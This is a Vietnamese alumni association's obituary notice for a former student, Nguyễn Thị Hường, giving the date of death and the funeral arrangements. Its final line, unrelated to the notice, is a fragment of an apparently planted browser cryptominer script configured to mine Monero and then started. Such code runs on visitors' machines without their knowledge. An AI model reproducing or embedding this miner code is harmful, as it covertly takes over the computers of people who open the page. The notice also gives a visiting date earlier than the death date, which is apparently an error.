TIN BUỒN - Bạn Nguyễn Thị Hường khóa 3 NLS ĐT đã từ trần.

                                                        TIN BUỒN

                                                                                      
Ban liên lạc cựu học viên NLS Định Tường - Bến Tre đau buồn báo tin:


Bạn Nguyễn Thị Hường, cựu học viên khóa 3  trường NLS Định Tường

Đã qua đời ngày 28 /02/2019 ( nhằm ngày 24 tháng Giêng năm Kỷ Hợi).
Hưởng dương 64 tuổi.
Linh cữu quàn tại tư gia đường Lâm Hoành, Phường An Lạc, Quận Bình Tân, Thành Phố Hồ Chí Minh.
Di quan lúc 11 giờ 30 phút ngày 3/3/2019 ( nhằm ngày 27 tháng Giêng năm Kỷ Hợi).

Tập thể thầy cô và CHV NLS Định Tường - Bến Tre chân thành chia buồn cùng gia đình Bạn Nguyễn Thị Hường. Cầu mong hương hồn của bạn sớm tiêu diêu nơi miền cực lạc.

Ban liên lạc viếng tang lúc 9 giờ ngày 2 tháng 2 năm 2019.
Các bạn CHV NLS Định Tường Khóa 3 sẽ đưa tang vào lúc sáng ngày 3 tháng 3 năm 2019.


', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();